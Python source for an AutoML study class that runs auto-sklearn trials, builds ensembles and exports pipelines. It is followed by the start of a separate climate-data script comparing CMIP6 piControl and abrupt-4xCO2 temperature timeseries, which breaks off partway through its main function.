# Signature of an objective callable: takes a Trial and returns its score.
ObjectiveFuncType = Callable[[trial_module.Trial], float]
def _name_estimators(estimators):
"""Generate names for estimators."""
names = [type(estimator).__name__.lower() for estimator in estimators]
namecount = defaultdict(int)
for est, name in zip(estimators, names):
namecount[name] += 1
for k, v in list(six.iteritems(namecount)):
if v == 1:
del namecount[k]
for i in reversed(range(len(estimators))):
name = names[i]
if name in namecount:
names[i] += "-%d" % namecount[name]
namecount[name] -= 1
return list(zip(names, estimators))
class Study(object):
    """An optimization task: a named set of trials sharing data and storage.

    A study corresponds to one optimization task, i.e. a set of trials run
    against the same training/test data.  Direct use of this constructor is
    not recommended.

    The object provides interfaces to run new trials, access the trials'
    history, and set/get user-defined attributes of the study itself.

    Args:
        study_name:
            Study's name. Each study has a unique name as an identifier.
        storage:
            Storage object (or a specifier accepted by ``get_storage``) that
            holds the training/test data and all trial results.
    """
def __init__(
self,
study_name, # type: str
storage, # type: Union[str, storages.BaseStorage]
sample_method=None,
sample_params=dict(),
is_autobin=False,
bin_params=dict(),
metrics: str ='logloss',
export_model_path=None,
precision=np.float64,
):
"""[summary]
Arguments:
study_name {[type]} -- [description]
Keyword Arguments:
sample_params {[type]} -- [description] (default: {dict()})
is_autobin {bool} -- [description] (default: {False})
bin_params {[type]} -- [description] (default: {dict()})
export_model_path {[type]} -- [description] (default: {None})
precision {[np.dtype]} -- precision:
np.dtypes, float16, float32, float64 for data precision to reduce memory size. (default: {None})
"""
self.study_name = study_name
self.storage = get_storage(storage)
self.sample_method = sample_method
if sample_method == 'lus':
self.sampler = LocalUncertaintySampling(**sample_params)
else:
self.sampler = None
self.is_autobin = is_autobin
if self.is_autobin:
if len(bin_params) > 1:
self.bin_params = bin_params
else:
self.bin_params = dict()
self.bin_params['binning_method'] = 'xgb'
self.binner = AutobinningTransform(**self.bin_params)
# uuid4+time.time(), uuid5
self.study_id = self.storage.get_study_id_from_name(study_name)
self.logger = logging.get_logger(__name__)
self.trial_list = []
# export model. should be joblib.Memory object
self.pipeline = None
self.export_model_path = export_model_path
self.precision = precision
self.stack = EnsembleStack()
self.layer = list()
self.ensemble = None
self.metrics = metrics
# opt_est = ['gaussian_nb','random_forest', 'sgd', 'xgradient_boosting'] + [t for t in classification._addons.components]
opt_est = ['gaussian_nb','random_forest', 'sgd'] + [t for t in classification._addons.components]
hint = """
You can generate trial by study.generate_trial(mode='fast').
The option of trial estimator is recomended: {}
""".format(str(opt_est))
self.logger.warn(hint)
def __getstate__(self):
# type: () -> Dict[Any, Any]
state = self.__dict__.copy()
del state['logger']
return state
def __setstate__(self, state):
# type: (Dict[Any, Any]) -> None
self.__dict__.update(state)
self.logger = logging.get_logger(__name__)
def __init_bin_params(self,):
params = dict()
params['binning_method'] = 'xgb'
params['binning_value_type'] = 'woe'
@property
def best_value(self):
# type: () -> float
"""Return the best objective value in the :class:`~diego.study.Study`.
Returns:
A float representing the best objective value.
"""
best_value = self.best_trial.value
if best_value is None:
raise ValueError('No trials are completed yet.')
return best_value
@property
def best_trial(self):
# type: () -> basic.FrozenTrial
"""Return the best trial in the :class:`~diego.study.Study`.
Returns:
"""
bt = self.storage.get_best_trial(self.study_id)
return bt
@property
def all_trials(self):
return self.storage.get_all_trials(self.study_id)
@property
def direction(self):
# type: () -> basic.StudyDirection
"""Return the direction of the :class:`~diego.study.Study`.
Returns:
"""
return self.storage.get_study_direction(self.study_id)
@property
def trials(self):
# type: () -> List[basic.FrozenTrial]
"""Return all trials in the :class:`~diego.study.Study`.
Returns:
"""
return self.storage.get_all_trials(self.study_id)
@property
def user_attrs(self):
# type: () -> Dict[str, Any]
"""Return user attributes.
Returns:
A dictionary containing all user attributes.
"""
return self.storage.get_study_user_attrs(self.study_id)
@property
def system_attrs(self):
# type: () -> Dict[str, Any]
"""Return system attributes.
Returns:
A dictionary containing all system attributes.
"""
return self.storage.get_study_system_attrs(self.study_id)
    def optimize(
            self, X_test, y_test,
            timeout=None,  # type: Optional[float]
            n_jobs=-1,  # type: int
            # type: Union[Tuple[()], Tuple[Type[Exception]]]
            catch=(Exception, ),
            precision=None,
    ):
        # type: (...) -> None
        """Run all trials against the stored training data and build an ensemble.

        Preprocesses the data (optional sampling and auto-binning), runs every
        trial sequentially, stacks the results into an ensemble, and exports
        the final pipeline.

        Args:
            X_test:
                Test feature matrix; validated with ``check_X_y`` and stored
                in the study's storage.
            y_test:
                Test target vector.
            timeout:
                Stop the study after the given number of seconds. :obj:`None`
                means no time limitation.
            n_jobs:
                Requested parallelism; normalized via
                ``basic.get_approp_n_jobs``. NOTE(review): parallelism is
                currently handled inside each Trial, so this only affects
                trial initialization here.
            catch:
                Exception types a trial may raise without aborting the study.
                Default is ``(Exception,)``: all non-exit exceptions are
                handled by this logic.
            precision:
                NOTE(review): when falsy (default), X_test is down-cast to
                ``self.precision``; when a dtype is passed, X_test is not cast
                at all — presumably it should cast to `precision`; confirm.
        """
        X_test, y_test = check_X_y(X_test, y_test)
        if not precision:
            X_test = X_test.astype(dtype=self.precision, copy=False)
        self.storage.set_test_storage(X_test, y_test)
        # Drop local references and collect immediately to cap peak memory;
        # the storage now owns the (possibly down-cast) copies.
        del X_test
        del y_test
        gc.collect()
        # TODO Preprocess Trial
        if self.sample_method == 'lus':
            self.logger.info('Sampling training dataset with lus. Origin data shape is {0}'.format(
                str(self.storage.X_train.shape)))
            # X_train, y_train = self.storage.X_train, self.storage.y_train
            # The sampler replaces the training data in storage in place.
            self.storage.X_train, self.storage.y_train = self.sampler.fit_transform(self.storage.X_train, self.storage.y_train)
            self.logger.info(
                'Sampling is done. Sampled data shape is {0}'.format(str(self.storage.X_train.shape)))
            # self.storage.set_train_storage(X_train, y_train)
        if self.is_autobin:
            self.logger.info("begin to autobinning data by {} with method {}".format(
                type(self.binner), self.binner.binning_method))
            # Fit bins on the training data, then apply the same binning to
            # both train and test so they stay consistent.
            self.binner.fit(self.storage.X_train, self.storage.y_train)
            self.storage.X_train = self.binner.transform(self.storage.X_train)
            self.storage.X_test = self.binner.transform(self.storage.X_test)
            # self.storage.set_train_storage(X_train, self.storage.y_train)
            # self.storage.set_test_storage(X_test, y_test)
            self.logger.warning(
                'Binning is done. Binning would transform test_data to new bin.')
            self._pipe_add(self.binner)
        n_jobs = basic.get_approp_n_jobs(n_jobs)
        # Record the class labels seen in training; _make_ensemble relies on
        # self.classes_ being set here.
        y = np.copy(self.storage.y_train)
        self.classes_ = np.unique(y)
        n_classes = len(self.classes_)
        self.n_classes = n_classes
        classes_ = self.classes_  # NOTE(review): unused local — confirm before removing.
        if self.trial_list is None or self.trial_list == []:
            self.logger.warning('no trials, init by default params.')
            self.trial_list = self._init_trials(n_jobs)
        if self.metrics in ['logloss']:
            self.storage.direction = basic.StudyDirection.MINIMIZE
        # Multiprocessing is currently handled inside each Trial.
        # if n_jobs == 1:
        #     self._optimize_sequential(self.trial_list, timeout, catch)
        # else:
        #     self._optimize_parallel(self.trial_list, timeout, n_jobs, catch)
        import warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=RuntimeWarning)
            # do not generate clf in advanced.
            self._optimize_sequential(
                self.trial_list, timeout, catch, metrics=self.metrics)
        # Stack all trials into an ensemble, keep the single best classifier
        # in the export pipeline, and write the pipeline out if configured.
        self._make_ensemble()
        self._pipe_add(self.best_trial.clf)
        self._export_model(self.export_model_path)
    def _make_ensemble(self):
        """Stack all trial classifiers into a mean-combined ensemble and score it.

        Builds an Ensemble from ``self.layer`` (populated by _run_trial), refits it
        on the training split, then logs its score on the held-out test split using
        the study's configured metric.
        """
        ensemble = Ensemble(self.layer, classes=self.classes_)
        self.stack.add_layer(ensemble)
        combiner = Combiner('mean')
        self.ensemble = EnsembleStackClassifier(stack=self.stack, combiner=combiner)
        # Refit on the full training data so every member is trained consistently.
        self.ensemble.refit(self.storage.X_train, self.storage.y_train)
        self.logger.info(self.ensemble.clf.show_models())
        test_res = self.ensemble.predict(self.storage.X_test)
        metrics_func = self._get_metric(self.metrics)
        # metrics_func = self._get_metric('acc')
        result = metrics_func(self.storage.y_test, test_res)
        self.logger.info("The ensemble of all trials get the result: {0} {1}".format(self.metrics, result))
    def show_models(self):
        """Print every step of the fitted pipeline, expanding auto-sklearn steps."""
        for step in self.pipeline.steps:
            name, estm = step
            if isinstance(estm, AutoSklearnClassifier):
                # auto-sklearn estimators can describe their internal ensemble.
                print(name, estm.show_models())
            else:
                print(name, estm)
    def set_user_attr(self, key, value):
        # type: (str, Any) -> None
        """Set a user attribute to the :class:`~diego.study.Study`.

        Args:
            key: A key string of the attribute.
            value: A value of the attribute. The value should be JSON serializable.
        """
        # Persistence is delegated to the storage backend.
        self.storage.set_study_user_attr(self.study_id, key, value)
    def set_system_attr(self, key, value):
        # type: (str, Any) -> None
        """Set a system attribute to the :class:`~diego.study.Study`.

        Note that diego internally uses this method to save system messages. Please use
        :func:`~diego.study.Study.set_user_attr` to set users' attributes.

        Args:
            key: A key string of the attribute.
            value: A value of the attribute. The value should be JSON serializable.
        """
        # Persistence is delegated to the storage backend.
        self.storage.set_study_system_attr(self.study_id, key, value)
    def trials_dataframe(self, include_internal_fields=False):
        # type: (bool) -> pd.DataFrame
        """Export trials as a pandas DataFrame_.

        The DataFrame_ provides various features to analyze studies. It is also useful to draw a
        histogram of objective values and to export trials as a CSV file. Note that DataFrames
        returned by :func:`~diego.study.Study.trials_dataframe()` employ MultiIndex_, and columns
        have a hierarchical structure. Please refer to the example below to access DataFrame
        elements.

        Example:
            Get an objective value and a value of parameter ``x`` in the first row.

            >>> df = study.trials_dataframe()
            >>> df
            >>> df.value[0]
            0.0
            >>> df.params.x[0]
            1.0

        Args:
            include_internal_fields:
                By default, internal fields of :class:`~diego.basic.FrozenTrial` are excluded
                from a DataFrame of trials. If this argument is :obj:`True`, they will be included
                in the DataFrame.

        Returns:
            A pandas DataFrame_ of trials in the :class:`~diego.study.Study`.

        .. _DataFrame: http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html
        .. _MultiIndex: https://pandas.pydata.org/pandas-docs/stable/advanced.html
        """
        # column_agg is an aggregator of column names.
        # Keys of column agg are attributes of FrozenTrial such as 'trial_id' and 'params'.
        # Values are dataframe columns such as ('trial_id', '') and ('params', 'n_layers').
        column_agg = collections.defaultdict(set)  # type: Dict[str, Set]
        non_nested_field = ''
        records = []  # type: List[Dict[Tuple[str, str], Any]]
        # NOTE(review): this reads ``self.trials_list`` while other methods use
        # ``self.trial_list`` -- confirm both attributes exist on the study.
        for trial in self.trials_list:
            trial_dict = trial._asdict()
            record = {}
            for field, value in trial_dict.items():
                if not include_internal_fields and field in basic.FrozenTrial.internal_fields:
                    continue
                if isinstance(value, dict):
                    # Nested dicts (e.g. params) expand into second-level columns.
                    for in_field, in_value in value.items():
                        record[(field, in_field)] = in_value
                        column_agg[field].add((field, in_field))
                else:
                    record[(field, non_nested_field)] = value
                    column_agg[field].add((field, non_nested_field))
            records.append(record)
        columns = sum((sorted(column_agg[k])
                       for k in basic.FrozenTrial._fields), [])
        return pd.DataFrame(records, columns=pd.MultiIndex.from_tuples(columns))
    def _init_trials(self, n_jobs=1):
        """Return the default trial list: one 'fast' auto-sklearn trial over tree/NB estimators."""
        # tpot was dropped: it takes too long and underperforms auto-sklearn
        # within the same time budget.
        auto_sklearn_trial = self.generate_trial(mode='fast', n_jobs=n_jobs, include_estimators=[
            "extra_trees", "random_forest", "gaussian_nb"])
        return [auto_sklearn_trial]
def _optimize_sequential(
self,
trials, # type: Optional[int]
timeout, # type: Optional[float]
catch,
metrics: str='logloss',
):
# type: (...) -> None
time_start = datetime.datetime.now()
for trial in trials:
if timeout is not None:
elapsed_seconds = (datetime.datetime.now() -
time_start).total_seconds()
if elapsed_seconds >= timeout:
break
self._run_trial(trial, catch, metrics=metrics)
gc.collect()
# TODO multi clf
def _optimize_parallel(
self,
trials,
timeout, # type: Optional[float]
n_jobs, # type: int
catch # type: Union[Tuple[()], Tuple[Type[Exception]]]
):
# type: (...) -> None
self.start_datetime = datetime.datetime.now()
if n_jobs == -1:
n_jobs = multiprocessing.cpu_count()
n_trials = len(trials)
if trials is not None:
# The number of threads needs not to be larger than trials.
n_jobs = min(n_jobs, n_trials)
if trials == 0:
return # When n_jobs is zero, ThreadPool fails.
pool = multiprocessing.pool.ThreadPool(n_jobs) # type: ignore
# A queue is passed to each thread. When True is received, then the thread continues
# the evaluation. When False is received, then it quits.
def func_child_thread(que):
# type: (Queue) -> None
while que.get():
self._run_trial(trial, catch)
self.storage.remove_session()
que = multiprocessing.Queue(maxsize=n_jobs) # type: ignore
for _ in range(n_jobs):
que.put(True)
n_enqueued_trials = n_jobs
imap_ite = pool.imap(func_child_thread, [que] * n_jobs, chunksize=1)
while True:
if timeout is not None:
elapsed_timedelta = datetime.datetime.now() - self.start_datetime
elapsed_seconds = elapsed_timedelta.total_seconds()
if elapsed_seconds > timeout:
break
if n_trials is not None:
if n_enqueued_trials >= n_trials:
break
try:
que.put_nowait(True)
n_enqueued_trials += 1
except queue.Full:
time.sleep(1)
for _ in range(n_jobs):
que.put(False)
# Consume the iterator to wait for all threads.
collections.deque(imap_ite, maxlen=0)
pool.terminate()
que.close()
que.join_thread()
@staticmethod
def _get_metric(metrics):
if metrics == 'auc' or metrics == 'roc_auc':
return diego_metrics.roc_auc
elif metrics == 'logloss':
return diego_metrics.log_loss
elif metrics == 'acc' or metrics == 'accuracy':
return diego_metrics.accuracy
elif metrics == 'balanced_acc' or metrics == 'balanced_accuracy':
return diego_metrics.balanced_accuracy
elif metrics == 'f1' or metrics == 'f1_score':
return diego_metrics.f1
elif metrics == 'mae':
return diego_metrics.mean_absolute_error
    def _run_trial(self, trial, catch, metrics='auc'):
        # type: (ObjectiveFuncType, Union[Tuple[()], Tuple[Type[Exception]]]) -> trial_module.Trial
        """Fit one trial, score it on the test split, and record its final state.

        Exceptions listed in ``catch`` mark the trial FAIL instead of propagating;
        a NaN score also marks it FAIL. On success the score is reported to the
        trial and the state set to COMPLETE.
        """
        trial_number = trial.number
        metrics_func = self._get_metric(metrics)
        try:
            trial = self.fit_autosk_trial(trial,)
            # Keep the fitted classifier for the final stacking ensemble.
            self.layer.append(trial.clf)
            y_pred = trial.clf.predict_proba(self.storage.X_test)
            result = metrics_func(self.storage.y_test, y_pred)
        # except basic.TrialPruned as e:
        #     message = 'Setting status of trial#{} as {}. {}'.format(trial_number,
        #                                                             basic.TrialState.PRUNED,
        #                                                             str(e))
        #     self.logger.info(message)
        #     self.storage.set_trial_state(trial_id, basic.TrialState.PRUNED)
        #     return trial
        except catch as e:
            message = 'Setting status of trial#{} as {} because of the following error: {}'\
                .format(trial_number, basic.TrialState.FAIL, repr(e))
            self.logger.warning(message, exc_info=True)
            self.storage.set_trial_state(trial_number, basic.TrialState.FAIL)
            self.storage.set_trial_system_attr(
                trial_number, 'fail_reason', message)
            return trial
        try:
            # result = float(result)
            self.logger.info('Trial{} was done'.format(trial.number))
        except (
                ValueError,
                TypeError,
        ):
            # Defensive guard kept from the float() cast above; with the cast
            # commented out this branch is effectively unreachable.
            message = 'Setting status of trial#{} as {} because the returned value from the ' \
                      'objective function cannot be casted to float. Returned value is: ' \
                      '{}'.format(
                          trial_number, basic.TrialState.FAIL, repr(result))
            self.logger.warning(message)
            self.storage.set_trial_state(trial_number, basic.TrialState.FAIL)
            self.storage.set_trial_system_attr(
                trial_number, 'fail_reason', message)
            return trial
        if math.isnan(result):
            message = 'Setting status of trial#{} as {} because the objective function ' \
                      'returned {}.'.format(
                          trial_number, basic.TrialState.FAIL, result)
            self.logger.warning(message)
            self.storage.set_trial_state(trial_number, basic.TrialState.FAIL)
            self.storage.set_trial_system_attr(
                trial_number, 'fail_reason', message)
            return trial
        trial.report(result)
        self.storage.set_trial_state(trial_number, basic.TrialState.COMPLETE)
        self._log_completed_trial(trial_number, result)
        return trial
def _log_completed_trial(self, trial_number, value):
# type: (int, float) -> None
self.logger.info('Finished trial#{} resulted in value: {}. '
'Current best value is {}.'.format(
trial_number, value, self.best_value))
    # TODO decorator, add trials to pipeline.
    def fit_autosk_trial(self, trial, **kwargs):
        """Fit an AutoSklearnClassifier built from ``trial.clf_params`` on the training split.

        For non-holdout resampling strategies the classifier is refit on the whole
        training set so that predict() works afterwards. The fitted classifier is
        attached to the trial as ``trial.clf``.
        """
        # n_jobs = basic.get_approp_n_jobs(n_jobs)
        trial_number = trial.number
        params = trial.clf_params
        autosk_clf = AutoSklearnClassifier(**params)
        # X_train = self.storage.X_train
        # y_train = self.storage.y_train
        # TODO metrics to trial
        autosk_clf.fit(self.storage.X_train, self.storage.y_train)
        if autosk_clf.resampling_strategy not in ['holdout', 'holdout-iterative-fit']:
            self.logger.warning(
                'Predict is currently not implemented for resampling strategy, refit it.')
            self.logger.warning(
                'we call refit() which trains all models in the final ensemble on the whole dataset.')
            autosk_clf.refit(self.storage.X_train, self.storage.y_train)
        self.logger.info('Trial#{0} info :{1}'.format(
            trial_number, autosk_clf.sprint_statistics()))
        trial.clf = autosk_clf
        return trial
def generate_trial(self, mode='fast', n_jobs=-1, time_left_for_this_task=3600, per_run_time_limit=360,memory_limit=8192,
initial_configurations_via_metalearning=0, ensemble_size=50, ensemble_nbest=50,
seed=1,include_estimators=['random_forest', 'LogisticRegressionSK', 'LogisticRegressionSMAC'],
exclude_estimators=None, include_preprocessors=None, exclude_preprocessors=None,
resampling_strategy='cv', resampling_strategy_arguments={'folds': 5},
tmp_folder="/tmp/autosklearn_tmp", output_folder="/tmp/autosklearn_output", delete_tmp_folder_after_terminate=True, delete_output_folder_after_terminate=True,
disable_evaluator_output=False, get_smac_object_callback=None, smac_scenario_args=None,
logging_config=None):
""" generate trial's base params
estimators list:
# Combinations of non-linear models with feature learning:
classifiers_ = ["adaboost", "decision_tree", "extra_trees",
"gradient_boosting", "k_nearest_neighbors",
"libsvm_svc", "random_forest", "gaussian_nb",
"decision_tree", "xgradient_boosting",
"LogisticRegressionSK", "LogisticRegressionSMAC"]
# Combinations of tree-based models with feature learning:
regressors_ = ["adaboost", "decision_tree", "extra_trees",
"gaussian_process", "gradient_boosting",
"k_nearest_neighbors", "random_forest", "xgradient_boosting"]
Keyword Arguments:
mode {str} -- [description] (default: {'fast'})
n_jobs {int} -- [description] (default: {-1})
mode {str} --
estimators list
Returns:
[type] -- [description]
"""
n_jobs = basic.get_approp_n_jobs(n_jobs)
if mode == 'fast':
time_left_for_this_task = 120
per_run_time_limit = 30
memory_limit = 4096
ensemble_size = 5
ensemble_nbest = 2
elif mode == 'big':
ensemble_size = 50
ensemble_nbest = 20
memory_limit = 10240
# ensemble_memory_limit = 4096
time_left_for_this_task = 14400
per_run_time_limit = 1440
else:
pass
from pathlib import Path
home_dir =str(Path.home())
if not os.path.exists(home_dir + '/tmp'):
os.mkdir(home_dir+"/tmp")
# split to several trial, and ensemble them
# for est in include_estimators:
auto_sklearn_trial = create_trial(self)
# auto_sklearn_trial.storage.clean_storage()
train_folder = home_dir + tmp_folder + "_" + str(self.study_id) + "_" + str(auto_sklearn_trial.number)
train_output_folder = home_dir + output_folder + "_" + str(self.study_id) + "_" + str(auto_sklearn_trial.number)
if not os.path.exists(tmp_folder):
os.mkdir(tmp_folder)
if not os.path.exists(output_folder):
os.mkdir(output_folder)
self.logger.info('The tmp result will saved in {}'.format(tmp_folder))
self.logger.info('The output of classifier will save in {}'.format(output_folder))
self.logger.info('And it will delete tmp folder after terminate.')
metrics_func = self._get_metric(self.metrics)
base_params = {'n_jobs': n_jobs,
"time_left_for_this_task": time_left_for_this_task,
"per_run_time_limit": per_run_time_limit,
"initial_configurations_via_metalearning": initial_configurations_via_metalearning,
"ensemble_size": ensemble_size,
"ensemble_nbest": ensemble_nbest,
# "ensemble_memory_limit": ensemble_memory_limit,
"seed": seed,
"memory_limit": memory_limit,
"include_estimators": include_estimators,
"exclude_estimators": exclude_estimators,
"include_preprocessors": include_preprocessors,
"exclude_preprocessors": exclude_preprocessors,
"resampling_strategy": resampling_strategy,
"resampling_strategy_arguments": resampling_strategy_arguments,
"tmp_folder":train_folder, "output_folder": train_output_folder,
"delete_tmp_folder_after_terminate": delete_tmp_folder_after_terminate,
"delete_output_folder_after_terminate": delete_output_folder_after_terminate,
# "shared_mode": shared_mode,
"disable_evaluator_output": disable_evaluator_output,
"get_smac_object_callback": get_smac_object_callback,
"smac_scenario_args": smac_scenario_args,
"logging_config": logging_config,
'metric': metrics_func}
# n_jobs ": basic.get_approp_n_jobs(n_jobs)
auto_sklearn_trial.clf_params = base_params
self.trial_list.append(auto_sklearn_trial)
return auto_sklearn_trial
    def add_preprocessor_trial(self, trial):
        """Placeholder: attach a preprocessing trial to the study (not implemented yet)."""
        pass
    def _pipe_add(self, step):
        """add steps to Study.pipeline

        Creates ``self.pipeline`` on first use; afterwards appends the step
        (auto-named via _name_estimators). A whole Pipeline replaces an unset
        ``self.pipeline`` directly.

        Arguments:
            step {[list]} -- ['name', clf]
        """
        if isinstance(step, list):
            # NOTE(review): a list object never has a .fit attribute, so this
            # branch raises for every list -- confirm whether a ['name', clf]
            # pair was actually meant to be unpacked here.
            if step is not None and not hasattr(step, "fit"):
                raise TypeError("Last step of Pipeline should implement fit. "
                                "'%s' (type %s) doesn't"
                                % (step, type(step)))
        if isinstance(step, Pipeline) and self.pipeline is None:
            self.pipeline = step
            return
        else:
            pass
        if self.pipeline is None:
            self.pipeline = make_pipeline(step)
        else:
            steps = _name_estimators([step])
            self.pipeline.steps += steps
def _export_model(self, export_model_path):
if export_model_path is None or export_model_path == '':
return
# export_model_path = '/tmp/'+model_name
model_name = 'diego_model_' + str(self.study_name) + '.joblib'
to_export_model_path = export_model_path + model_name
joblib.dump(self.pipeline, to_export_model_path)
ensemble_name = 'diego_ensemble_' + str(self.study_name) + '.joblib'
export_ensemble_path = export_model_path + ensemble_name
joblib.dump(self.pipeline, export_ensemble_path)
def create_trial(study: Study):
    """Create a new Trial registered under ``study`` in its storage and return it."""
    trial_id = study.storage.create_new_trial_id(study.study_id)
    trial = Trial(study, trial_id)
    return trial
def get_storage(storage):
    # type: (Union[None, str, BaseStorage]) -> BaseStorage
    """Return ``storage`` unchanged, or a fresh in-memory Storage when it is None."""
    return Storage() if storage is None else storage
def create_study(X, y,
                 storage=None,  # type: Union[None, str, storages.BaseStorage]
                 sample_method=None,
                 metrics=None,
                 study_name=None,  # type: Optional[str]
                 direction='maximize',  # type: str
                 load_cache=False,  # type: bool
                 is_autobin=False,
                 bin_params=dict(),
                 sample_params=dict(),
                 trials_list=list(),
                 export_model_path=None,
                 precision=np.float64,
                 ):
    # type: (...) -> Study
    """Create a new :class:`~diego.study.Study`.

    Args:
        storage:
            Database URL. If this argument is set to None, in-memory storage is used, and the
            :class:`~diego.study.Study` will not be persistent.
        sampler:
            A sampler object that implements background algorithm for value suggestion. See also
            :class:`~diego.samplers`.
        study_name:
            Study's name. If this argument is set to None, a unique name is generated
            automatically.
        direction:
            'minimize' or 'maximize'; note that metrics='logloss' forces MINIMIZE
            regardless of this argument.
        is_auto_bin: do autobinning
        bin_params: binning method
        precision {[np.dtype]} -- precision:
            np.dtypes, float16, float32, float64 for data precision to reduce memory size. (default: {np.float64})

    Returns:
        A :class:`~diego.study.Study` object.
    """
    X, y = check_X_y(X, y, accept_sparse='csr')
    storage = get_storage(storage)
    try:
        study_id = storage.create_new_study_id(study_name)
    except basic.DuplicatedStudyError:
        # In-memory studies should not share a name; an existing Study could be
        # reloaded instead (data lives in storage) -- see the commented code below.
        # if load_if_exists:
        #     assert study_name is not None

        #     logger = logging.get_logger(__name__)
        #     logger.info("Using an existing study with name '{}' instead of "
        #                 "creating a new one.".format(study_name))
        #     study_id = storage.get_study_id_from_name(study_name)
        # else:
        raise

    study_name = storage.get_study_name_from_id(study_id)
    study = Study(
        study_name=study_name,
        storage=storage,
        sample_method=sample_method,
        is_autobin=is_autobin,
        bin_params=bin_params,
        export_model_path=export_model_path,
        precision=precision,
        metrics=metrics)

    if direction == 'minimize':
        _direction = basic.StudyDirection.MINIMIZE
    elif direction == 'maximize':
        _direction = basic.StudyDirection.MAXIMIZE
    else:
        raise ValueError(
            'Please set either \'minimize\' or \'maximize\' to direction.')
    # logloss is a loss, so it always overrides the requested direction.
    if metrics in ['logloss']:
        _direction = basic.StudyDirection.MINIMIZE
    # Cast once up front to the requested precision to save memory downstream.
    X = X.astype(dtype=precision, copy=False)
    study.storage.direction = _direction
    study.storage.set_train_storage(X, y)
    return study
def load_study(
        study_name,  # type: str
        storage,  # type: Union[str, storages.BaseStorage]
):
    # type: (...) -> Study
    """Load the existing :class:`~diego.study.Study` that has the specified name.

    Args:
        study_name:
            Study's name. Each study has a unique name as an identifier.
        storage:
            Database URL such as ``sqlite:///example.db``. diego internally uses `SQLAlchemy
            <https://www.sqlalchemy.org/>`_ to handle databases. Please refer to `SQLAlchemy's
            document <https://docs.sqlalchemy.org/en/latest/core/engines.html#database-urls>`_ for
            further details.
    """
    return Study(study_name=study_name, storage=storage)
def get_all_study_summaries(storage):
    # type: (Union[str, storages.BaseStorage]) -> List[basic.StudySummary]
    """Get all history of studies stored in a specified storage.

    Args:
        storage:
            Database URL.

    Returns:
        List of study history summarized as :class:`~diego.basic.StudySummary` objects.
    """
    storage = get_storage(storage)
    return storage.get_all_study_summaries()
| lai-bluejay/diego | diego/study.py | study.py | py | 34,931 | python | en | code | 8 | github-code | 90 |
17409216990 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Compare piControl and abrupt-4xCO2 timeseries of tas.
"""
from cmiputil import esgfsearch
from cmiputil.timer import timer
from pprint import pprint
from os.path import basename
from pathlib import Path
import argparse
import json
import xarray as xr
from cftime import num2date
import matplotlib.pyplot as plt
__author__ = 'T.Inoue'
__credits__ = 'Copyright (c) 2019 RIST'
__version__ = 'v20190614'
__date__ = '2019/06/14'
desc = __doc__
epilog = """
`Experiment_id` and `variable_id` are forced as above, regardless of the
setting in config file and command line option.
"""
def my_parser():
    """Build the command-line argument parser for this script."""
    p = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=desc, epilog=epilog)
    p.add_argument('-d', '--debug', action='store_true', default=False)
    p.add_argument('-c', '--conffile', type=str, default="",
                   help='config file')
    p.add_argument('-l', '--local', action='store_true', default=False,
                   help='search local data')
    p.add_argument('params', type=str, nargs='*', default=None,
                   help='key=value series of keyword/facet parameters')
    return p
def composeMeta(datasets):
    """
    Compose meta info dictionaries from a list of xarray.Dataset
    obtained by getDatasets().

    Returns the `meta` dictionary keyed by experiment_id (falsy datasets are
    skipped), or None when `datasets` itself is None.
    """
    if datasets is None:
        return None
    meta = {}
    for ds in datasets:
        if not ds:
            continue
        dsname = basename(ds.further_info_url)
        print(f"Compose meta info for: {dsname}")
        try:
            var = ds[ds.variable_id]
        except IndexError:
            print(f"{ds.variable_id} not found in {dsname}")
            raise
        var_id = getattr(var, 'name')
        t_size = getattr(ds.time, 'size', None)
        # Sometimes time.units is missing; num2date then raises AttributeError.
        t_units = getattr(ds.time, 'units', None)
        try:
            t_range = str(num2date(ds.time[[0, -1]], t_units))
        except AttributeError:
            t_range = str(ds.time.data[[0, -1]])
        meta.setdefault(ds.experiment_id, []).append({
            # No filepath() or path related attributes in xarray.dataset.
            # 'file': ds.filepath(),
            'source': ds.source_id,
            'experiment_id': ds.experiment_id,
            'variable|id': var_id,
            'variable|long_name': var.long_name,
            # BUG FIX: key was misspelled 'variabel|units'.
            'variable|units': var.units,
            'calendar': ds['time'].calendar,
            'branch_time': ds.branch_time_in_parent,
            't_units': t_units,
            't_size': t_size,
            't_range': t_range
        })
    return meta
def openDatasets(data_urls):
    """
    Open and return dataset objects from dataset URLs.

    Each URL (or list of URLs, opened as a multi-file dataset) is handed to
    _openDataset(); failures yield None and are dropped from the result.
    """
    opened = (_openDataset(url) for url in data_urls)
    return [ds for ds in opened if ds]
def _openDataset(url):
    """Open one dataset URL (a list is opened as a multi-file dataset); None on failure."""
    try:
        if type(url) is list:
            ds = xr.open_mfdataset(url, decode_cf=False)
        else:
            # ds = xr.open_dataset(url,
            #                      decode_times=False, decode_cf=False)
            ds = xr.open_dataset(url, decode_cf=False)
    except (KeyError, OSError) as e:
        # Skipped datasets return None implicitly.
        print(f"Error in opening xarray dataset:"
              f"{basename(url)}:{e.args}\n Skip.")
    else:
        return ds
def openLocalDatasets(data_files):
    """
    Open and return dataset objects from local dataset paths.

    Returns None when `data_files` is empty or None; otherwise opens each path
    via _openLocalDataset() and keeps the truthy results.
    """
    if not data_files:
        return None
    return [ds for ds in (_openLocalDataset(p) for p in data_files) if ds]
def _openLocalDataset(p):
    """Open path(s) ``p`` as a (multi-file) xarray dataset without decoding times."""
    # BUG FIX: removed leftover debug print of the path.
    return xr.open_mfdataset(p, decode_times=False)
def drawPlot(datasets):
    """Plot the area-mean timeseries of each dataset's main variable on one figure."""
    # to shut up the warning message...
    # from pandas.plotting import register_matplotlib_converters
    # register_matplotlib_converters()

    fig = plt.figure(figsize=(16, 8))
    ax = fig.add_subplot(111)
    for d in datasets:
        label = ':'.join((d.source_id, d.experiment_id, d.variant_label))
        print(f"plotting {label}")
        try:
            # Just a quick hack, should get area averaged.
            # d['tas'].sel(lon=0, lat=0, method='nearest')\
            #         .plot(ax=ax, label=label)
            d[d.variable_id].mean(('lon', 'lat')).plot(ax=ax, label=label)
        except RuntimeError as e:
            # Plot whatever datasets succeed; report and skip the rest.
            print('Skip error:', e.args)
            continue
    ax.legend()
    print('Ready to plot...')
    plt.show()
    print('Done.')
def main():
    """CLI entry point: search ESGF (or local files), open datasets, dump meta info, plot."""
    a = my_parser().parse_args()

    # Collect key=value facet parameters from the command line.
    params = {}
